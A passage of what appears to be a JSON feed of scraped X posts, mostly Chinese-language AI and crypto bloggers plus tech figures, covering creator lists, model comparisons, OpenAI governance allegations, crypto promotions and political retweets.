出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/bozhou_ai/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/chuxiaeth/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的", + "url": "https://x.com/bozhou_ai/status/2049033808629129504", + "published_at": "2026-04-28T07:51:43+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说得太对了👍,牛逼", + "url": "https://x.com/lxfater/status/2049026986442707117", + "published_at": "2026-04-28T07:24:37+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "x.com/i/article/204902020458…", + "url": "https://x.com/bozhou_ai/status/2049021892208521544", + "published_at": "2026-04-28T07:04:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "x.com/i/article/204837140806…", + "url": "https://x.com/lxfater/status/2049019768456241273", + "published_at": "2026-04-28T06:55:56+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 来源:\n\n[1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17\n[2] https://thenextweb.com/news/openai-is-in-talks-to-buy-fusion-energy-from-helion\n[3] https://www.cnbc.com/2026/02/25/thrive-capital-openai-joshua-kushner.html\n[4] https://slguardian.org/conflict-of-interest-storm-engulfs-openai-as-sam-altmans-private-deals-face-scrutiny/\n[5] https://techcentral.co.za/greg-brockmans-diary-takes-centre-stage-in-musk-vs-openai/280684/\n[6] https://x.com/elonmusk/status/2048801964457140540(Musk 原推:「Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style」)", + "url": "https://x.com/lxfater/status/2049009528595685705", + "published_at": "2026-04-28T06:15:15+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法\n\n2015 年,OpenAI 打着非营利的旗号成立\n顶级研究员冲着使命感来,不要钱只要理想\nMusk 看到了,砸了 3800 万进去\n监管也没把它当商业公司盯\n\n连 Musk 这种人都信了\n\n但 CEO 在想另一件事\n\nAltman 从 2014 年开始,在核聚变公司 Helion 买了股\n2021 年一口气砸进去 3.75 亿美元,这是他个人最大的一笔押注 [1]\n\n然后他提议,让 OpenAI 向 Helion 投 5 亿美元\n这 5 亿进去,Helion 估值直接涨 6 倍,他自己的股份跟着涨 [1]\n\nOpenAI 内部的人看出问题了\n员工觉得 Helion 的技术根本没到那个阶段,而且 CEO 这么做,明摆着是用公司的钱给自己的投资抬价\n董事会拒绝了 [1]\n\n看起来,这件事到这里结束了\n\n但 Altman 还有一招\n\n他让 OpenAI 跟 Helion 签了一份购电协议\n2035 年前买 Helion 的 50 吉瓦电力\n就是说,OpenAI 承诺未来要用 Helion 的电\n那些电,现在还没发出来 [2]\n\nHelion 拿着这份协议去融资,融到了 2.5 亿美元,估值 150 亿\n领投的 Thrive Capital 跟 Altman 关系很深,同时也是 OpenAI 的投资人,往里投了超过 10 亿美元 [3]\n\n股权投资被拒了\n他换了个形式,把同样的事做完了\n\nMusk 把这套操作叫做 Y Combinator 风格 [6]\n就是 YC 那套圈内玩法:互相投资、互相背书,写进合同结构里,外人看全是正常生意\n\nAltman 就是从 YC 出来的\n\nMusk 说,Altman 用这套方式给自己安排了几十笔交易\n(这是 Musk 的指控,庭审还在进行,法庭没有裁定)[6]\n\n但 2023 年 11 月,董事会把 Altman 踢走的时候说的是:\n\n他投了什么公司,我们根本不知道 [4]\n\n不是没想查,是这个结构本来就看不出来\n非营利机构没有上市公司那套强制披露,CEO 替 OpenAI 谈的每笔交易,到底是为公司还是为自己,没人能判断\n\n今天,Musk 的庭审正式开始\nBrockman 的日记、Helion 这条线、整套结构,第一次摆到台面上 [5]\n\nMusk 能不能赢不好说\n\n但那套结构,还在别的地方跑着", + "url": "https://x.com/lxfater/status/2049009402372313341", + "published_at": "2026-04-28T06:14:44+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "GPT-5.5 在 Code Arena 排第 9\n\n难道是 OpenAI 编程这块掉队了?\n\n但 Arena 自己的统计负责人,几小时后发了条澄清\n\n这榜单,当前只测前端或者说Web DEV\n\nGPT-5.5全栈和 GitHub 集成,还要几个月才上,所以现在这方面很弱。\n\n所以不是它编码不行,是它前端这块比 Claude 弱\n\nCode Arena,Code范围仅仅前端也太不合理了吧", + "url": "https://x.com/lxfater/status/2049001091916783635", + "published_at": "2026-04-28T05:41:43+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "青椒肉丝饭 + 老盐百香果 6u", + "url": "https://x.com/0xAA_Science/status/2049000780519321906", + "published_at": "2026-04-28T05:40:29+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。", + "url": "https://x.com/frxiaobei/status/2048991998275965022", + "published_at": "2026-04-28T05:05:35+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Unfortunately, those in power in Sacramento seem blind to second order effects. We are now in a situation where this wealth tax is very likely to pass. This means founders who control their companies through super voting shares (instead of ceding control to VCs) need to start preparing to leave the state. I wish we could entice more founders to come and build here instead of forcing people away. The top 1% of earners pay 40% of income tax (CA actually has the most progressive income/cap gains tax system in the world). If we could double that 1% group (by building people up and recruiting people here), we’d increase our taxes by 40%! Instead, we are pushing away those top 1% of earners and risking dropping our tax revenue by 40%. And for founders with super voting, they effectively are forced to leave. Basically we need to hope that Gavin pulls off a last minute save and negotiates with the sponsoring union to pull the Wealth Tax proposition.", + "url": "https://x.com/naval/status/2048985810842865914", + "published_at": "2026-04-28T04:41:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "绝了哈哈哈哈,卖铲子给卖铲子的人。。。其实就是用 new-api 一键部署一个,竟然卖这么贵。我觉得我也可以这么搞🤣", + "url": "https://x.com/dingyi/status/2048980519019528349", + "published_at": "2026-04-28T04:19:58+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "快连被墙干服了,关停了中国大陆的服务。\n\n我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。\n有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。", + "url": "https://x.com/0xAA_Science/status/2048973617854328890", + "published_at": "2026-04-28T03:52:33+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "已申请!邀请你参加 Xiaomi MiMo Orbit 百万亿 Token 创造者激励计划,100T Credits 面向全球用户限时发放中...\n\nhttps://100t.xiaomimimo.com/", + "url": "https://x.com/dingyi/status/2048967160287072576", + "published_at": "2026-04-28T03:26:53+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "小扎当年在天安门跑步,跪舔了半天也没得到国家的好处,这次国家算是还了人情。半年后再看,谁还要收购这么个破玩意,小扎做梦都要笑醒了。\n\n创始团队也没啥损失,再搞一个项目很快就会拿到风投估值上亿。", + "url": "https://x.com/dingyi/status/2048948980655292914", + "published_at": "2026-04-28T02:14:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc\n\nIn just one year, it has been almost completely dismantled\n\nOf 1500 scientists, only 124 remain\n\nhttps://www.nytimes.com/2026/04/27/climate/epa-science-trump-cuts.html?unlocked_article_code=1.eVA.yCwJ.TYSUUslTTFoa&smid=tw-share", + "url": "https://x.com/ylecun/status/2048931628995510596", + "published_at": "2026-04-28T01:05:42+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多", + "url": "https://x.com/bozhou_ai/status/2048921844175212590", + "published_at": "2026-04-28T00:26:49+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: “Calling Trump a fascist incites political violence”\n\nHere’s a compilation of Trump calling his opponents fascists", + "url": "https://x.com/ylecun/status/2048879552022130882", + "published_at": "2026-04-27T21:38:46+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: New work with @AlecRad and @DavidDuvenaud:\n\nHave you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. \n\nVintage models should help us to understand how LMs generalize (e.g., can we teach talkie to code?). Thread:", + "url": "https://x.com/karpathy/status/2048878495539843211", + "published_at": "2026-04-27T21:34:34+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: He is right", + "url": "https://x.com/ylecun/status/2048871429681148028", + "published_at": "2026-04-27T21:06:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song 2 (remix much better then original)\n\nhttps://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048865167233200586", + "published_at": "2026-04-27T20:41:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song\nhttps://www.youtube.com/watch?v=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048863662396658146", + "published_at": "2026-04-27T20:35:37+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.", + "url": "https://x.com/DavidSacks/status/2048821257534111863", + "published_at": "2026-04-27T17:47:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: x.com/a16z/status/1985413352…", + "url": "https://x.com/DavidSacks/status/2048813533136060459", + "published_at": "2026-04-27T17:16:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian future they claim to oppose. From last year:\n https://x.com/a16z/status/1985413352349413542/video/1?s=48", + "url": "https://x.com/DavidSacks/status/2048813311668486300", + "published_at": "2026-04-27T17:15:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.", + "url": "https://x.com/DavidSacks/status/2048811495224390105", + "published_at": "2026-04-27T17:08:20+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: A completely local agent that lives right inside your browser.\n\nPowered by Gemma 4 E2B and WebGPU, it uses native tool calling to:\n\n🔍 Search browsing history\n📄 Read and summarize pages\n🔗 Manage tabs\n\n100% local. No servers needed!", + "url": "https://x.com/frxiaobei/status/2048805789788413984", + "published_at": "2026-04-27T16:45:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Amazing", + "url": "https://x.com/frxiaobei/status/2048805385537306677", + "published_at": "2026-04-27T16:44:03+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil", + "url": "https://x.com/eladgil/status/2048803386938495412", + "published_at": "2026-04-27T16:36:07+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。\n\n但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。\n\n像极了刚走向社会的二愣子。", + "url": "https://x.com/frxiaobei/status/2048802517237350599", + "published_at": "2026-04-27T16:32:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。\n😤\n虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。", + "url": "https://x.com/frxiaobei/status/2048800504206282887", + "published_at": "2026-04-27T16:24:39+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 years. Supporters of this action live in a fantasy dystopia about how science operates.", + "url": "https://x.com/ylecun/status/2048779086168838610", + "published_at": "2026-04-27T14:59:33+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "最近想玩链游的可以看看 @RealGoOfficial 这个游戏\n\n他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。\n\n他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如 Doge、Floki、Toshi 和 WIF 等等,之前和 @xhunt_ai 也有过合作。\n\n大概今年 Q2 会 TGE,有时间可以玩一玩,可以参加一下他们的忠诚度计划,玩游戏或交互都可以撸积分和代币。", + "url": "https://x.com/wolfyxbt/status/2048764088193569049", + "published_at": "2026-04-27T13:59:57+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "把 new-api 的 UI 用 Hero UI 重构了一遍。之前他们用的那个抖音的 semi 设计系统太垃圾了。", + "url": "https://x.com/dingyi/status/2048760423491764431", + "published_at": "2026-04-27T13:45:23+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://x.com/JeffDean/status/2048759102390899142", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://x.com/soumithchintala/status/2048756358820827564", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the net error rate in counting presidential votes was 0.007%. The median shift in any county's vote count was zero.", + "url": "https://x.com/ylecun/status/2048740712556933170", + "published_at": "2026-04-27T12:27:04+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Image", + "url": "https://x.com/Stv_Lynn/status/2048713165232644251", + "published_at": "2026-04-27T10:37:36+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: AI has had one safest technology roll-outs in history.\n\nRead that again, because it's a fact. \n\nIt's used by billions with a tiny fraction of a percent of actual problems.\n\nAnd yet it's seen as dangerous or unsafe by many.\n\nThere's a constant chorus of people shouting about its supposed dangers with no evidence whatsoever where it matters most: here, in the real world.\n\nSo what do we actually have here in reality?\n\nA few cases in courts about early versions of ChatGPT allegedly being too sycophantic and not recognizing mental illness or someone in trouble, that are still making their way through courts and may prove wrong or right (some of the media released snippets are damning but not definitive).\n\nTime will tell. Innocent until proven guilty. The very nature of court litigation is often to find a scapegoat for something that gets thrown out in the actual process of the trial.\n\nBut outside of that, what? \n\nAnswer: not much.\n\nAnd viewed through the lens of other technology in history its incident rate is probably lower than lawnmowers.\n\nIt makes little sense when you think of it through the lens of other tech like cars and planes, which had atrocious early track records. \n\nAI even has a better track record of safety than nuclear.\n\nDespite being incredibly safe overall, nuclear had several high profile and dangerous failures with Three Mile Island and Fukishima.\n\nWith AI, nothing of the sort. Not even remotely.\n\nI can hear the naysayers now saying \"so far, but just you wait!\"\n\nAnd yet we keep waiting. And waiting. And waiting.\n\nAI fear is a remarkably resilient beast. \n\nIt's resilient despite zero actual harms manifesting here in reality land.\n\nSelf-driving cars are remarkably safer than humans who kill 1.2 million people and injure 50 million more each year world wide. (I wrote 1.5M in an early posted and missed my typo).\n\nWaymo cars are roughly 10X safer than humans with minimal injuries and fatalities. Even early self-driving cars had incredibly good safety records vis-a-vis early cars driven by humans that had bad safety records even up through the 1950s and 60s.\n\nWhen it comes to cars, society actually resisted making them safer. People fought having to wear seatbelts because they had to pay for them. They resisted early drunk driving laws as impingements on their freedom.\n\nEarly plane travels was incredibly dangerous. It took many many decades of work to make them the marvels of safety they are today.\n\nWhat about jobs?\n\nWe have AI execs talking about the \"end of work\" and yet they're hiring more people in the very profession that is supposedly most exposed: programming. Often at super high salaries approaching half a million dollars a year.\n\nDemand for good programmers is rising.\n\nWe've certainly had execs claim they let people go because of AI. But a deeper look at these claims quickly reveals that most of them are just an easy way to get around labor laws or to simp to shareholders and more readily attributable to COVID over hiring. Tell shareholders \"AI\" is the reason for layoffs and you're rewarded for being more \"efficient.\" Tell them you have to lay people off because you over hired or just made mistakes and your stock gets hammered.\n\nThe truth is that anyone who uses AI seriously at the frontier sees how much they have to baby sit it and hand hold it and steer it. It is not doing any job end to end. It's doing tasks and that is about it.\n\nNow it will certainly get better but will it magically make the leap from task to job? Maybe. But we'll need evidence of that in, you guessed it, reality before we start making policy decisions.\n\nSo what other problems do we have here in reality?\n\nNothing but the two problems I've already discussed at length in my work:\n\nSurveillance and weapons of war.\n\nBut these are not new. They're just things that AI enhances, just like computers enhanced them, and better materials science, and many other tech revolutions before them.\n\nAgain, ask yourself, really ask yourself, where are the real problems? \n\nAnd again, there's a loud chorus of people who keep shouting \"just you wait, I imagined this problem in my head and it's totally inevitable because I say so\" and yet billions of people are using this technology every day with no problems.\n\nNow you could say \"Russell's Turkey.\" The trend is the trend until it breaks. But then the burden is on you to prove the trend is breaking. There is no evidence of it other than in people's minds.\n\nAt what point do people just wake up and realize that none of this makes any sense?\n\nIt's not that there won't be problems. It's just that often times the problems we imagine (we've been imagining the end of all work for 100 years) don't match what happens in actual reality. The problems turn out to be very different and you can only deal with them when they come up.\n\nA lot of politicians today imagined if they had only \"gotten ahead\" of the Internet with regulations we'd be in a much better place.\n\nUtter nonsense. When Section 230 was passed the number one question among Congress was \"what is the Internet?\" And these folks are supposed to imagine TikTok 25 years later? \n\nNo. \n\nWe have to deal with problems as they come up, not imaginary problems that some very vocal people promise are coming. The burden is on them to prove it and writing long essays from \"first principles thinking\" and scary books does not count as evidence for anything at all.\n\nAt what point does the cognitive dissonance hit and people wake up and say, maybe I was wrong?\n\nProbably never.\n\nBeliefs are a tricky thing and wrong beliefs have caused more problems in world history than AI ever will.", + "url": "https://x.com/ylecun/status/2048709585360367651", + "published_at": "2026-04-27T10:23:22+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "Meta 对 Manus 的收购被中国发改委驳回。\n看来以后要么一开始就出海,要么就不出海。", + "url": "https://x.com/0xAA_Science/status/2048685380304871774", + "published_at": "2026-04-27T08:47:12+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~", + "url": "https://x.com/0xAA_Science/status/2048666088733581805", + "published_at": "2026-04-27T07:30:32+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好\n\n现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了", + "url": "https://x.com/bozhou_ai/status/2048663377598452202", + "published_at": "2026-04-27T07:19:46+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Image", + "url": "https://x.com/ylecun/status/2048655735412650355", + "published_at": "2026-04-27T06:49:24+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 中文AI必关注12位高价值博主\n\nAI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。\n\n我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。\n\n1. 摸鱼巨匠 @SunNeverSetsX\nAI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强\n\n2. Rachel @Zesee\n前微软亚马逊产品人,现在深耕AI营销创业,分享产品开发实操和行业洞察,干货密度高\n\n3. 小将 @nftbanker\n欧洲GenAI大会主办方 + 最大华人AI出海社区创始人,副业创业和落地案例特别实在\n\n4. WaytoAGI @WaytoAGI\n中文AI知识库整理专家,像随身AI百科一样持续更新一手资讯和实战总结\n\n5. 汗青 HQ @hq4ai\n\nAI创意与AIGC艺术应用先锋,专注虚拟偶像、AI-IP创作和短视频灵感,技术与艺术结合得非常出色\n\n6. Mulight 沐光 @0xMulight\n专注AI工具深度测评 + 手机端高效工作流(Hermes WebUI等),自动化提效方案直接能用,实用党福音\n\n7. 阿西_出海 @axichuhai\nAI+LLM+Agent副业实战派,分享自媒体变现路径和真实落地打法\n\n8. 泊舟 @bozhou_ai\nVibe编码与Agent构建高手,系统Prompt和高效工作流拆解非常清晰\n\n9. berryxia @berryxia\nPrompt工程与AI工具设计专家,设计+编码+提示词三合一输出,质量顶尖\n\n10. CuiMao @CuiMao\n纯干货AI开发者,不接广告,专注深度学习实战分享\n\n11. GoSailGlobal @GoSailGlobal\n独立SaaS出海玩家,AI产品价值提炼和真实创业经验分享很接地气\n\n12. 范凯说 AI @fankaishuoai\nAI时代个人转型实战导师,提供可直接执行的框架和落地方法论", + "url": "https://x.com/bozhou_ai/status/2048640580004335669", + "published_at": "2026-04-27T05:49:10+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "狗B们在组团在 bags 分流太空狗,好恶心啊。\n下次它们买什么,咱们就去找个新盘子分,好吗?", + 